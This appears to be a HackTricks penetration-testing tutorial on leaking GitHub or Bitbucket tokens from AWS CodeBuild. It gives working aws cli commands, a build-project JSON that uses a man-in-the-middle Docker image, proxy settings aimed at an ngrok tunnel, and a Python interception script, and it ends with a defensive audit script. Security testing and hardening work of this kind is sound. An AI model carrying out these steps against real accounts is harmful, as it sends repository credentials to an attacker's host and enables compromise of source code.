AWS Codebuild - Token Leakage

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

Recover Github/Bitbucket Configured Tokens

First, check if there are any source credentials configured that you could leak:

aws codebuild list-source-credentials

Via Docker Image

If you find that authentication to, for example, Github is set in the account, you can exfiltrate that access (GH token or OAuth token) by making Codebuild use a specific Docker image to run the build of the project.

For this purpose you could create a new Codebuild project or change the environment of an existing one to set the Docker image.

The Docker image you could use is https://github.com/carlospolop/docker-mitm. This is a very basic Docker image that sets the env variables https_proxy, http_proxy and SSL_CERT_FILE. This will allow you to intercept most of the traffic of the host indicated in https_proxy and http_proxy, trusting the SSL cert indicated in SSL_CERT_FILE.

  1. Create & Upload your own Docker MitM image

    • Follow the instructions of the repo to set your proxy IP address, set your SSL cert and build the Docker image.

      • DO NOT SET http_proxy, so that requests to the metadata endpoint are not intercepted.

    • You could use ngrok, like ngrok tcp 4444, to set the proxy to your host

    • Once you have the Docker image built, upload it to a public repo (Dockerhub, ECR...)

  2. Set the environment

    • Create a new Codebuild project or modify the environment of an existing one.

    • Set the project to use the previously generated Docker image

  3. Set the MitM proxy in your host

    • As indicated in the Github repo you could use something like:

mitmproxy --listen-port 4444  --allow-hosts "github.com"

The mitmproxy version used was 9.0.1; it was reported that with version 10 this might not work.

  4. Run the build & capture the credentials

    • You can see the token in the Authorization header:

This could also be done from the aws cli with something like:

# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json

## With /tmp/buildspec.json (JSON does not allow inline comments; use "ARM_CONTAINER" as the environment type to run the ARM build of docker-mitm)
{
    "name": "my-demo-project",
    "source": {
        "type": "GITHUB",
        "location": "https://github.com/uname/repo",
        "buildspec": "buildspec.yml"
    },
    "artifacts": {
        "type": "NO_ARTIFACTS"
    },
    "environment": {
        "type": "LINUX_CONTAINER",
        "image": "docker.io/carlospolop/docker-mitm:v12",
        "computeType": "BUILD_GENERAL1_SMALL",
        "imagePullCredentialsType": "CODEBUILD"
    }
}

# Start the build (the project name must match the "name" in the JSON)
aws codebuild start-build --project-name my-demo-project

Via HTTP protocol

This vulnerability was corrected by AWS at some point during the week of the 20th of February 2023 (I think on Friday). So an attacker can't abuse it anymore :)

An attacker with elevated permissions over a CodeBuild project could leak the configured Github/Bitbucket token or, if access was configured via OAuth, the temporary OAuth token used to access the code.

  • An attacker could add the environment variables http_proxy and https_proxy to the CodeBuild project pointing to his machine (for example http://5.tcp.eu.ngrok.io:14972).

  • Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: http://github.com/carlospolop-forks/TestActions (note the http:// scheme)

  • Then, run the basic example from https://github.com/synchronizing/mitm on the port pointed to by the proxy variables (http_proxy and https_proxy):

from mitm import MITM, protocol, middleware, crypto

mitm = MITM(
    host="127.0.0.1",
    port=4444,                      # the local port the proxy variables point to (through the ngrok tunnel)
    protocols=[protocol.HTTP],      # plain HTTP is enough once the repo URL uses http://
    middlewares=[middleware.Log],   # the Log middleware prints the intercepted requests and responses
    certificate_authority=crypto.CertificateAuthority(),
)
mitm.run()

  • Finally, click on "Build the project"; the credentials will be sent in clear text (base64) to the mitm port:

Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use it more easily than by using the CodeBuild service directly.
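As an added defensive counterpart to both scenarios above (this is example code, not HackTricks' or the docker-mitm project's), the script below audits CodeBuild project descriptions in the same shape as the create-project JSON above (or the `projects` list returned by `aws codebuild batch-get-projects`) and flags the indicators both techniques rely on: a build image that is not AWS-managed, proxy/CA environment variables, and a plain-http source URL. The sample projects, the ci-* names and the TRUSTED_IMAGE_PREFIXES/PROXY_VARS lists are constructed assumptions.

```python
import json

# AWS-managed (curated) CodeBuild images start with this prefix; anything
# else is a custom image that the project owner (or an attacker) controls.
TRUSTED_IMAGE_PREFIXES = ("aws/codebuild/",)
# Variables that redirect build traffic or change which CA the build trusts.
PROXY_VARS = {"http_proxy", "https_proxy", "HTTP_PROXY", "HTTPS_PROXY", "SSL_CERT_FILE"}

def audit_project(project: dict) -> list:
    """Return findings for one project in create-project / batch-get-projects shape."""
    findings = []
    name = project.get("name", "<unnamed>")
    env = project.get("environment", {})
    image = env.get("image", "")
    if not image.startswith(TRUSTED_IMAGE_PREFIXES):
        findings.append(f"{name}: custom build image {image!r}")
    for var in env.get("environmentVariables", []):
        if var.get("name") in PROXY_VARS:
            findings.append(f"{name}: proxy/CA variable {var['name']}={var.get('value')!r}")
    location = project.get("source", {}).get("location", "")
    if location.lower().startswith("http://"):
        findings.append(f"{name}: plaintext source URL {location!r}")
    return findings

def audit_all(projects: list) -> dict:
    """Map each project name to its findings (an empty list means nothing flagged)."""
    return {p["name"]: audit_project(p) for p in projects}

# Constructed sample projects mirroring the page's two scenarios (not real accounts).
SAMPLE_PROJECTS = [
    {"name": "ci-normal",
     "source": {"type": "GITHUB", "location": "https://github.com/org/app"},
     "environment": {"type": "LINUX_CONTAINER", "image": "aws/codebuild/standard:7.0",
                     "environmentVariables": [{"name": "STAGE", "value": "prod"}]}},
    {"name": "ci-custom-image",
     "source": {"type": "GITHUB", "location": "https://github.com/org/app"},
     "environment": {"type": "LINUX_CONTAINER",
                     "image": "docker.io/carlospolop/docker-mitm:v12",
                     "imagePullCredentialsType": "CODEBUILD"}},
    {"name": "ci-http-proxy",
     "source": {"type": "GITHUB", "location": "http://github.com/org/app"},
     "environment": {"type": "LINUX_CONTAINER", "image": "aws/codebuild/standard:7.0",
                     "environmentVariables": [
                         {"name": "http_proxy", "value": "http://5.tcp.eu.ngrok.io:14972"},
                         {"name": "https_proxy", "value": "http://5.tcp.eu.ngrok.io:14972"}]}},
]

if __name__ == "__main__":
    print(json.dumps(audit_all(SAMPLE_PROJECTS), indent=2))
```

In a real account, feed it the `projects` list from `aws codebuild batch-get-projects --names ...` and treat any finding on a project whose account also has entries in `list-source-credentials` as the highest priority.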
